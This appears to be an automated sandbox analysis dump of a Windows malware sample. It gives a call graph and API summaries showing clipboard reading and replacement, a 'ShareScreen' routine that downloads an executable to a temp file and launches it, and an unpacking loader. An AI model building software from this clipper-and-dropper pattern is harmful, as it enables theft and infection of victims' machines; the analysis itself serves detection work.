65256->65257 65258 431f67 65256->65258 65260 434d1a _Atexit 17 API calls 65257->65260 65263 431fc4 SetLastError 65257->65263 65276 435101 11 API calls 2 library calls 65258->65276 65261 431f7f 65260->65261 65262 431f87 65261->65262 65277 435157 11 API calls 2 library calls 65261->65277 65266 43345a _free 17 API calls 65262->65266 65264 42e06f 65263->65264 65264->65249 65264->65250 65275 4354e6 10 API calls 2 library calls 65264->65275 65268 431f8d 65266->65268 65267 431f9c 65267->65262 65269 431fa3 65267->65269 65270 431fbb SetLastError 65268->65270 65278 431d3c 20 API calls _Atexit 65269->65278 65270->65264 65272 431fae 65273 43345a _free 17 API calls 65272->65273 65274 431fb4 65273->65274 65274->65263 65274->65270 65275->65250 65276->65257 65277->65267 65278->65272 65279->64913 65280 402394 65281 402557 PostQuitMessage 65280->65281 65282 4023a8 65280->65282 65286 402555 65281->65286 65283 4023af DefWindowProcW 65282->65283 65284 4023c6 65282->65284 65283->65286 65285 4029ea 167 API calls 65284->65285 65284->65286 65285->65286 65287 432775 65288 43278b 65287->65288 65289 43279d 65288->65289 65291 43d00c 65288->65291 65294 43c9e1 65291->65294 65293 43d027 65293->65289 65297 43c9ed __FrameHandler3::FrameUnwindToState 65294->65297 65295 43c9fb 65312 42eab9 20 API calls _Atexit 65295->65312 65297->65295 65299 43ca34 65297->65299 65298 43ca00 65313 42a58d 26 API calls _Deallocate 65298->65313 65305 43cfbb 65299->65305 65304 43ca0a std::_Locinfo::_Locinfo_ctor 65304->65293 65315 43f931 65305->65315 65308 43ca58 65314 43ca81 LeaveCriticalSection __wsopen_s 65308->65314 65311 43345a _free 20 API calls 65311->65308 65312->65298 65313->65304 65314->65304 65316 43f954 65315->65316 65317 43f93d 65315->65317 65319 43f973 65316->65319 65320 43f95c 65316->65320 65386 42eab9 20 API calls _Atexit 65317->65386 65390 434f9a 10 API calls 2 library calls 65319->65390 65388 42eab9 20 API calls _Atexit 65320->65388 65322 43f942 65387 42a58d 26 API calls _Deallocate 65322->65387 65324 43f961 65389 42a58d 26 API calls _Deallocate 65324->65389 65325 43f97a MultiByteToWideChar 65328 43f9a9 65325->65328 65329 43f999 GetLastError 65325->65329 65392 433697 21 API calls 3 library calls 65328->65392 65391 42ea83 20 API calls 3 library calls 65329->65391 65330 43cfd1 65330->65308 65339 43d02c 65330->65339 65333 43f9b1 65334 43f9b8 MultiByteToWideChar 65333->65334 65337 43f9d9 65333->65337 65336 43f9cd GetLastError 65334->65336 65334->65337 65335 43345a _free 20 API calls 65335->65330 65393 42ea83 20 API calls 3 library calls 65336->65393 65337->65335 65394 43cd8f 65339->65394 65342 43d077 65412 43976e 65342->65412 65343 43d05e 65426 42eaa6 20 API calls _Atexit 65343->65426 65346 43d07c 65347 43d085 65346->65347 65348 43d09c 65346->65348 65428 42eaa6 20 API calls _Atexit 65347->65428 65425 43ccfa CreateFileW 65348->65425 65352 43d08a 65429 42eab9 20 API calls _Atexit 65352->65429 65354 43d152 GetFileType 65357 43d1a4 65354->65357 65358 43d15d GetLastError 65354->65358 65355 43d0d5 65355->65354 65360 43d127 GetLastError 65355->65360 65430 43ccfa CreateFileW 65355->65430 65356 43cff9 65356->65311 65434 4396b7 21 API calls 3 library calls 65357->65434 65432 42ea83 20 API calls 3 library calls 65358->65432 65359 43d063 65427 42eab9 20 API calls _Atexit 65359->65427 65431 42ea83 20 API calls 3 library calls 65360->65431 65363 43d16b CloseHandle 65363->65359 65365 43d194 65363->65365 65433 42eab9 20 API calls _Atexit 65365->65433 65367 43d11a 65367->65354 65367->65360 65369 43d1c5 65371 43d211 65369->65371 65435 43cf0b 169 API calls 4 library calls 65369->65435 65370 43d199 65370->65359 65375 43d23e 65371->65375 65436 43caad 167 API calls 4 library calls 65371->65436 65374 43d237 65374->65375 65376 43d24f 65374->65376 65437 4335bd 29 API calls 2 library calls 65375->65437 65376->65356 65378 43d2cd CloseHandle 65376->65378 65438 43ccfa CreateFileW 65378->65438 65380 43d2f8 65381 43d302 GetLastError 65380->65381 65385 43d247 65380->65385 65439 42ea83 20 API calls 3 library calls 65381->65439 65383 43d30e 65440 439880 21 API calls 3 library calls 65383->65440 65385->65356 65386->65322 65387->65330 65388->65324 65389->65330 65390->65325 65391->65330 65392->65333 65393->65337 65395 43cdb0 65394->65395 65396 43cdca 65394->65396 65395->65396 65448 42eab9 20 API calls _Atexit 65395->65448 65441 43cd1f 65396->65441 65399 43cdbf 65449 42a58d 26 API calls _Deallocate 65399->65449 65401 43ce02 65402 43ce31 65401->65402 65450 42eab9 20 API calls _Atexit 65401->65450 65411 43ce84 65402->65411 65452 42ffcf 26 API calls 2 library calls 65402->65452 65405 43ce26 65451 42a58d 26 API calls _Deallocate 65405->65451 65406 43ce7f 65407 43cefe 65406->65407 65406->65411 65453 42a5ba 11 API calls _Atexit 65407->65453 65410 43cf0a 65411->65342 65411->65343 65413 43977a __FrameHandler3::FrameUnwindToState 65412->65413 65456 42e3dd EnterCriticalSection 65413->65456 65415 439781 65417 4397a6 65415->65417 65421 439814 EnterCriticalSection 65415->65421 65423 4397c8 65415->65423 65460 43954d 21 API calls 3 library calls 65417->65460 65418 4397f1 std::_Locinfo::_Locinfo_ctor 65418->65346 65420 4397ab 65420->65423 65461 439694 EnterCriticalSection 65420->65461 65421->65423 65424 439821 LeaveCriticalSection 65421->65424 65457 439877 65423->65457 65424->65415 65425->65355 65426->65359 65427->65356 65428->65352 65429->65359 65430->65367 65431->65359 65432->65363 65433->65370 65434->65369 65435->65371 65436->65374 65437->65385 65438->65380 65439->65383 65440->65385 65443 43cd37 65441->65443 65442 43cd52 65442->65401 65443->65442 65454 42eab9 20 API calls _Atexit 65443->65454 65445 43cd76 65455 42a58d 26 API calls _Deallocate 65445->65455 65447 43cd81 65447->65401 65448->65399 65449->65396 65450->65405 65451->65402 65452->65406 65453->65410 65454->65445 65455->65447 65456->65415 65462 42e425 LeaveCriticalSection 65457->65462 65459 43987e 65459->65418 65460->65420 65461->65423 65462->65459 65463 4340fa 65464 434106 __FrameHandler3::FrameUnwindToState 65463->65464 65465 434112 65464->65465 65466 434129 65464->65466 65497 42eab9 20 API calls _Atexit 65465->65497 65476 42caef EnterCriticalSection 65466->65476 65469 434139 65477 434176 65469->65477 65470 434117 65498 42a58d 26 API calls _Deallocate 65470->65498 65473 434145 65499 43416c LeaveCriticalSection __fread_nolock 65473->65499 65475 434122 std::_Locinfo::_Locinfo_ctor 65476->65469 65478 434184 65477->65478 65479 43419e 65477->65479 65510 42eab9 20 API calls _Atexit 65478->65510 65500 4328f8 65479->65500 65482 4341a7 65507 4347c3 65482->65507 65483 434189 65511 42a58d 26 API calls _Deallocate 65483->65511 65486 434194 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65486->65473 65488 4342ab 65490 4342b8 65488->65490 65494 43425e 65488->65494 65489 43422f 65492 43424c 65489->65492 65489->65494 65513 42eab9 20 API calls _Atexit 65490->65513 65512 43448f 31 API calls 4 library calls 65492->65512 65494->65486 65514 43430b 30 API calls 2 library calls 65494->65514 65495 434256 65495->65486 65497->65470 65498->65475 65499->65475 65501 432904 65500->65501 65502 432919 65500->65502 65515 42eab9 20 API calls _Atexit 65501->65515 65502->65482 65504 432909 65516 42a58d 26 API calls _Deallocate 65504->65516 65506 432914 65506->65482 65517 434640 65507->65517 65509 4341c3 65509->65486 65509->65488 65509->65489 65510->65483 65511->65486 65512->65495 65513->65486 65514->65486 65515->65504 65516->65506 65518 43464c __FrameHandler3::FrameUnwindToState 65517->65518 65519 434654 65518->65519 65520 43466c 65518->65520 65552 42eaa6 20 API calls _Atexit 65519->65552 65521 434720 65520->65521 65526 4346a4 65520->65526 65557 42eaa6 20 API calls _Atexit 65521->65557 65524 434659 65553 42eab9 20 API calls _Atexit 65524->65553 65525 434725 65558 42eab9 20 API calls _Atexit 65525->65558 65542 439694 EnterCriticalSection 65526->65542 65530 43472d 65559 42a58d 26 API calls _Deallocate 65530->65559 65531 4346aa 65533 4346e3 65531->65533 65534 4346ce 65531->65534 65543 434745 65533->65543 65554 42eab9 20 API calls _Atexit 65534->65554 65535 434661 std::_Locinfo::_Locinfo_ctor 65535->65509 65538 4346d3 65555 42eaa6 20 API calls _Atexit 65538->65555 65539 4346de 65556 434718 LeaveCriticalSection __wsopen_s 65539->65556 65542->65531 65560 439911 65543->65560 65545 434757 65546 434770 SetFilePointerEx 65545->65546 65547 43475f 65545->65547 65548 434788 GetLastError 65546->65548 65551 434764 65546->65551 65573 42eab9 20 API calls _Atexit 65547->65573 65574 42ea83 20 API calls 3 library calls 65548->65574 65551->65539 65552->65524 65553->65535 65554->65538 65555->65539 65556->65535 65557->65525 65558->65530 65559->65535 65561 43991e 65560->65561 65563 439933 65560->65563 65575 42eaa6 20 API calls _Atexit 65561->65575 65567 439958 65563->65567 65577 42eaa6 20 API calls _Atexit 65563->65577 65564 439923 65576 42eab9 20 API calls _Atexit 65564->65576 65567->65545 65568 439963 65578 42eab9 20 API calls _Atexit 65568->65578 65570 43992b 65570->65545 65571 43996b 65579 42a58d 26 API calls _Deallocate 65571->65579 65573->65551 65574->65551 65575->65564 65576->65570 65577->65568 65578->65571 65579->65570 65580 5a0000 65583 5a0006 65580->65583 65584 5a0015 65583->65584 65587 5a07a6 65584->65587 65588 5a07c1 65587->65588 65589 5a07ca CreateToolhelp32Snapshot 65588->65589 65590 5a07e6 Module32First 65588->65590 65589->65588 65589->65590 65591 5a0005 65590->65591 65592 5a07f5 65590->65592 65594 5a0465 65592->65594 65595 5a0490 65594->65595 65596 5a04d9 65595->65596 65597 5a04a1 VirtualAlloc 65595->65597 65596->65596 65597->65596 65598 402bfa InternetOpenW 65599 402e4b 65598->65599 65602 402c2d ListArray 65598->65602 65600 40f8c5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65599->65600 65601 402e5a 65600->65601 65610 42deed 65602->65610 65605 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 65606 402e0d 65605->65606 65607 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 65606->65607 65608 402e1f InternetOpenUrlW 65607->65608 65608->65599 65609 402e3a InternetCloseHandle InternetCloseHandle 65608->65609 65609->65599 65611 42df0a 65610->65611 65612 42defc 65610->65612 65619 42eab9 20 API calls _Atexit 65611->65619 65612->65611 65617 42df3a 65612->65617 65614 42df14 65620 42a58d 26 API calls _Deallocate 65614->65620 65616 402dff 65616->65605 65617->65616 65621 42eab9 20 API calls _Atexit 65617->65621 65619->65614 65620->65616 65621->65614 65622 40fbfc 65623 40fc08 __FrameHandler3::FrameUnwindToState 65622->65623 65651 40ffe9 65623->65651 65625 40fc0f 65626 40fd62 65625->65626 65629 40fc39 65625->65629 65672 4104c3 4 API calls 2 library calls 65626->65672 65628 40fd69 65673 42ffb9 28 API calls _Atexit 65628->65673 65638 40fc78 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65629->65638 65666 42fcde 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 65629->65666 65631 40fd6f 65674 42ff6b 28 API calls _Atexit 65631->65674 65634 40fc52 65636 40fc58 65634->65636 65667 42fc82 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 65634->65667 65635 40fd77 65639 40fcd9 65638->65639 65668 42a356 167 API calls 4 library calls 65638->65668 65662 4105dd 65639->65662 65642 40fcdf 65643 40fcf4 65642->65643 65669 410613 GetModuleHandleW 65643->65669 65645 40fcfb 65645->65628 65646 40fcff 65645->65646 65647 40fd08 65646->65647 65670 42ff5c 28 API calls _Atexit 65646->65670 65671 410178 13 API calls 2 library calls 65647->65671 65650 40fd10 65650->65636 65652 40fff2 65651->65652 65675 41076b IsProcessorFeaturePresent 65652->65675 65654 40fffe 65676 428817 10 API calls 3 library calls 65654->65676 65656 410003 65657 410007 65656->65657 65677 431791 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65656->65677 65657->65625 65659 410010 65660 41001e 65659->65660 65678 428840 8 API calls 3 library calls 65659->65678 65660->65625 65679 426820 65662->65679 65665 410603 65665->65642 65666->65634 65667->65638 65668->65639 65669->65645 65670->65647 65671->65650 65672->65628 65673->65631 65674->65635 65675->65654 65676->65656 65677->65659 65678->65657 65680 4105f0 GetStartupInfoW 65679->65680 65680->65665 65681 4013ac 65682 4013b8 __EH_prolog3_GS 65681->65682 65703 404a7e 65682->65703 65684 4013d9 65717 403242 28 API calls _wcslen 65684->65717 65686 40140e 65718 4050df 28 API calls Concurrency::details::ResourceManager::RemoveExecutionResource 65686->65718 65688 4014c5 65691 4014e1 std::ios_base::_Ios_base_dtor 65688->65691 65722 40cc8c 26 API calls 2 library calls 65688->65722 65690 401443 65690->65688 65692 401495 _wcslen 65690->65692 65719 40c796 28 API calls BuildCatchObjectHelperInternal 65690->65719 65723 40ccb8 26 API calls _Deallocate 65691->65723 65720 40c796 28 API calls BuildCatchObjectHelperInternal 65692->65720 65695 40151a 65724 40ccb8 26 API calls _Deallocate 65695->65724 65698 4014bd 65721 40ccb8 26 API calls _Deallocate 65698->65721 65699 401522 65725 40fd82 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 65699->65725 65702 401529 65704 404a8a Concurrency::details::ResourceManager::RemoveExecutionResource 65703->65704 65726 40db1d 65704->65726 65706 404aa6 65738 4054c8 167 API calls 7 library calls 65706->65738 65708 404ab7 65739 405564 167 API calls 7 library calls 65708->65739 65710 404ac0 65740 405d4c 28 API calls 2 library calls 65710->65740 65712 404aee 65741 405e02 65712->65741 65714 404afa 65761 404ff3 26 API calls _Deallocate 65714->65761 65716 404b27 Concurrency::details::ResourceManager::RemoveExecutionResource 65716->65684 65717->65686 65718->65690 65719->65692 65720->65698 65721->65688 65722->65691 65723->65695 65724->65699 65725->65702 65727 40db29 Concurrency::details::ResourceManager::RemoveExecutionResource 65726->65727 65762 40de69 65727->65762 65732 40db47 65776 40dcac 167 API calls _Atexit 65732->65776 65733 40dba5 Concurrency::details::ResourceManager::RemoveExecutionResource 65733->65706 65735 40db4f 65777 40da75 21 API calls 2 library calls 65735->65777 65737 40db65 65768 40dec1 65737->65768 65738->65708 65739->65710 65740->65712 65742 405e0e __EH_prolog3_catch 65741->65742 65782 405d0f 22 API calls ListArray 65742->65782 65744 405e23 65783 406c2a 30 API calls ListArray 65744->65783 65746 405e2d 65747 405e47 Concurrency::details::ResourceManager::RemoveExecutionResource 65746->65747 65784 405cb1 22 API calls ListArray 65746->65784 65747->65714 65786 405a96 28 API calls 65747->65786 65750 405e3e 65785 406acd 22 API calls ListArray 65750->65785 65761->65716 65763 40de78 65762->65763 65764 40de7f 65762->65764 65778 42e43c EnterCriticalSection _Atexit 65763->65778 65766 40db34 65764->65766 65779 40f220 EnterCriticalSection 65764->65779 65766->65737 65775 40dc89 22 API calls 2 library calls 65766->65775 65769 42e445 65768->65769 65771 40decb 65768->65771 65781 42e425 LeaveCriticalSection 65769->65781 65772 40dede 65771->65772 65780 40f22e LeaveCriticalSection 65771->65780 65772->65733 65773 42e44c 65773->65733 65775->65732 65776->65735 65777->65737 65778->65766 65779->65766 65780->65772 65781->65773 65782->65744 65783->65746 65784->65750 65785->65747 65787 4332ce 65788 4332db 65787->65788 65792 4332f3 65787->65792 65837 42eab9 20 API calls _Atexit 65788->65837 65790 4332e0 65838 42a58d 26 API calls _Deallocate 65790->65838 65793 43334e 65792->65793 65801 4332eb 65792->65801 65839 434cbd 21 API calls 2 library calls 65792->65839 65794 4328f8 __fread_nolock 26 API calls 65793->65794 65796 433366 65794->65796 65807 432e06 65796->65807 65798 43336d 65799 4328f8 __fread_nolock 26 API calls 65798->65799 65798->65801 65800 433399 65799->65800 65800->65801 65802 4328f8 __fread_nolock 26 API calls 65800->65802 65803 4333a7 65802->65803 65803->65801 65804 4328f8 __fread_nolock 26 API calls 65803->65804 65805 4333b7 65804->65805 65806 4328f8 __fread_nolock 26 API calls 65805->65806 65806->65801 65808 432e12 __FrameHandler3::FrameUnwindToState 65807->65808 65809 432e32 65808->65809 65810 432e1a 65808->65810 65812 432ef8 65809->65812 65817 432e6b 65809->65817 65906 42eaa6 20 API calls _Atexit 65810->65906 65913 42eaa6 20 API calls _Atexit 65812->65913 65814 432e1f 65907 42eab9 20 API calls _Atexit 65814->65907 65815 432efd 65914 42eab9 20 API calls _Atexit 65815->65914 65819 432e7a 65817->65819 65820 432e8f 65817->65820 65908 42eaa6 20 API calls _Atexit 65819->65908 65840 439694 EnterCriticalSection 65820->65840 65822 432e87 65915 42a58d 26 API calls _Deallocate 65822->65915 65824 432e95 65826 432eb1 65824->65826 65827 432ec6 65824->65827 65825 432e7f 65909 42eab9 20 API calls _Atexit 65825->65909 65910 42eab9 20 API calls _Atexit 65826->65910 65841 432f19 65827->65841 65829 432e27 std::_Locinfo::_Locinfo_ctor 65829->65798 65833 432eb6 65911 42eaa6 20 API calls _Atexit 65833->65911 65834 432ec1 65912 432ef0 LeaveCriticalSection __wsopen_s 65834->65912 65837->65790 65838->65801 65839->65793 65840->65824 65842 432f43 65841->65842 65843 432f2b 65841->65843 65845 4332ad 65842->65845 65855 432f88 65842->65855 65925 42eaa6 20 API calls _Atexit 65843->65925 65943 42eaa6 20 API calls _Atexit 65845->65943 65846 432f30 65926 42eab9 20 API calls _Atexit 65846->65926 65849 4332b2 65944 42eab9 20 API calls _Atexit 65849->65944 65850 432f38 65850->65834 65852 432f93 65927 42eaa6 20 API calls _Atexit 65852->65927 65854 432f98 65928 42eab9 20 API calls _Atexit 65854->65928 65855->65850 65855->65852 65858 432fc3 65855->65858 65856 432fa0 65945 42a58d 26 API calls _Deallocate 65856->65945 65860 432fdc 65858->65860 65861 433002 65858->65861 65862 43301e 65858->65862 65860->65861 65866 432fe9 65860->65866 65929 42eaa6 20 API calls _Atexit 65861->65929 65932 433697 21 API calls 3 library calls 65862->65932 65865 433007 65930 42eab9 20 API calls _Atexit 65865->65930 65916 43d355 65866->65916 65867 433035 65872 43345a _free 20 API calls 65867->65872 65870 433187 65873 4331fd 65870->65873 65876 4331a0 GetConsoleMode 65870->65876 65871 43300e 65931 42a58d 26 API calls _Deallocate 65871->65931 65875 43303e 65872->65875 65878 433201 ReadFile 65873->65878 65877 43345a _free 20 API calls 65875->65877 65876->65873 65881 4331b1 65876->65881 65882 433045 65877->65882 65879 433275 GetLastError 65878->65879 65880 43321b 65878->65880 65883 433282 65879->65883 65884 4331d9 65879->65884 65880->65879 65885 4331f2 65880->65885 65881->65878 65886 4331b7 ReadConsoleW 65881->65886 65887 43306a 65882->65887 65888 43304f 65882->65888 65941 42eab9 20 API calls _Atexit 65883->65941 65903 433019 __fread_nolock 65884->65903 65938 42ea83 20 API calls 3 library calls 65884->65938 65898 433240 65885->65898 65899 433257 65885->65899 65885->65903 65886->65885 65891 4331d3 GetLastError 65886->65891 65935 4347de 65887->65935 65933 42eab9 20 API calls _Atexit 65888->65933 65891->65884 65892 43345a _free 20 API calls 65892->65850 65894 433287 65942 42eaa6 20 API calls _Atexit 65894->65942 65896 433054 65934 42eaa6 20 API calls _Atexit 65896->65934 65939 432c35 31 API calls 3 library calls 65898->65939 65902 43326e 65899->65902 65899->65903 65940 432a75 29 API calls __fread_nolock 65902->65940 65903->65892 65905 433273 65905->65903 65906->65814 65907->65829 65908->65825 65909->65822 65910->65833 65911->65834 65912->65829 65913->65815 65914->65822 65915->65829 65917 43d362 65916->65917 65918 43d36f 65916->65918 65946 42eab9 20 API calls _Atexit 65917->65946 65920 43d37b 65918->65920 65947 42eab9 20 API calls _Atexit 65918->65947 65920->65870 65922 43d39c 65948 42a58d 26 API calls _Deallocate 65922->65948 65923 43d367 65923->65870 65925->65846 65926->65850 65927->65854 65928->65856 65929->65865 65930->65871 65931->65903 65932->65867 65933->65896 65934->65903 65936 434745 __fread_nolock 28 API calls 65935->65936 65937 4347f4 65936->65937 65937->65866 65938->65903 65939->65903 65940->65905 65941->65894 65942->65903 65943->65849 65944->65856 65945->65850 65946->65923 65947->65922 65948->65923 65949 213003c 65950 2130049 65949->65950 65964 2130e0f SetErrorMode SetErrorMode 65950->65964 65955 2130265 65956 21302ce VirtualProtect 65955->65956 65958 213030b 65956->65958 65957 2130439 VirtualFree 65962 21305f4 LoadLibraryA 65957->65962 65963 21304be 65957->65963 65958->65957 65959 21304e3 LoadLibraryA 65959->65963 65961 21308c7 65962->65961 65963->65959 65963->65962 65965 2130223 65964->65965 65966 2130d90 65965->65966 65967 2130dad 65966->65967 65968 2130238 VirtualAlloc 65967->65968 65969 2130dbb GetPEB 65967->65969 65968->65955 65969->65968

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                  • Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D
                                                                                                • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                • _strlen.LIBCMT ref: 00401749
                                                                                                • _strlen.LIBCMT ref: 00401778
                                                                                                • _strlen.LIBCMT ref: 004018BC
                                                                                                • EmptyClipboard.USER32 ref: 004018D2
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                • CloseClipboard.USER32 ref: 0040193D
                                                                                                • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                • String ID: i
                                                                                                • API String ID: 1583243082-3865851505
                                                                                                • Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                • Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
                                                                                                • Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                • Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
                                                                                                • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
                                                                                                • GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
                                                                                                • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402AFD
                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00402B5E
                                                                                                • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
                                                                                                • CloseHandle.KERNEL32(?), ref: 00402B7F
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402B88
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402B8B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                • String ID: .exe$<$ShareScreen
                                                                                                • API String ID: 3323492106-493228180
                                                                                                • Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                • Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
                                                                                                • Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                • Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005A07CE
                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 005A07EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770031470.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5a0000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3833638111-0
                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction ID: ddff23bfc976efdd23f909281e9b30ba3b12fc154677e35f8f58673b1c304c94
                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction Fuzzy Hash: 11F090326117116FE7203BF9A88DB6F7AE8FF8A765F101528E643910C0DBB0FC458A61

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 74 43d02c-43d05c call 43cd8f 77 43d077-43d083 call 43976e 74->77 78 43d05e-43d069 call 42eaa6 74->78 83 43d085-43d09a call 42eaa6 call 42eab9 77->83 84 43d09c-43d0e5 call 43ccfa 77->84 85 43d06b-43d072 call 42eab9 78->85 83->85 93 43d152-43d15b GetFileType 84->93 94 43d0e7-43d0f0 84->94 95 43d34e-43d354 85->95 96 43d1a4-43d1a7 93->96 97 43d15d-43d18e GetLastError call 42ea83 CloseHandle 93->97 99 43d0f2-43d0f6 94->99 100 43d127-43d14d GetLastError call 42ea83 94->100 102 43d1b0-43d1b6 96->102 103 43d1a9-43d1ae 96->103 97->85 111 43d194-43d19f call 42eab9 97->111 99->100 104 43d0f8-43d125 call 43ccfa 99->104 100->85 107 43d1ba-43d208 call 4396b7 102->107 108 43d1b8 102->108 103->107 104->93 104->100 117 43d20a-43d216 call 43cf0b 107->117 118 43d218-43d23c call 43caad 107->118 108->107 111->85 117->118 123 43d240-43d24a call 4335bd 117->123 124 43d24f-43d292 118->124 125 43d23e 118->125 123->95 127 43d2b3-43d2c1 124->127 128 43d294-43d298 124->128 125->123 131 43d2c7-43d2cb 127->131 132 43d34c 127->132 128->127 130 43d29a-43d2ae 128->130 130->127 131->132 133 43d2cd-43d300 CloseHandle call 43ccfa 131->133 132->95 136 43d302-43d32e GetLastError call 42ea83 call 439880 133->136 137 43d334-43d348 133->137 136->137 137->132
                                                                                                APIs
                                                                                                  • Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                • GetLastError.KERNEL32 ref: 0043D140
                                                                                                • __dosmaperr.LIBCMT ref: 0043D147
                                                                                                • GetFileType.KERNEL32(00000000), ref: 0043D153
                                                                                                • GetLastError.KERNEL32 ref: 0043D15D
                                                                                                • __dosmaperr.LIBCMT ref: 0043D166
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0043D186
                                                                                                • CloseHandle.KERNEL32(?), ref: 0043D2D0
                                                                                                • GetLastError.KERNEL32 ref: 0043D302
                                                                                                • __dosmaperr.LIBCMT ref: 0043D309
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                • Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
                                                                                                • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                • Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
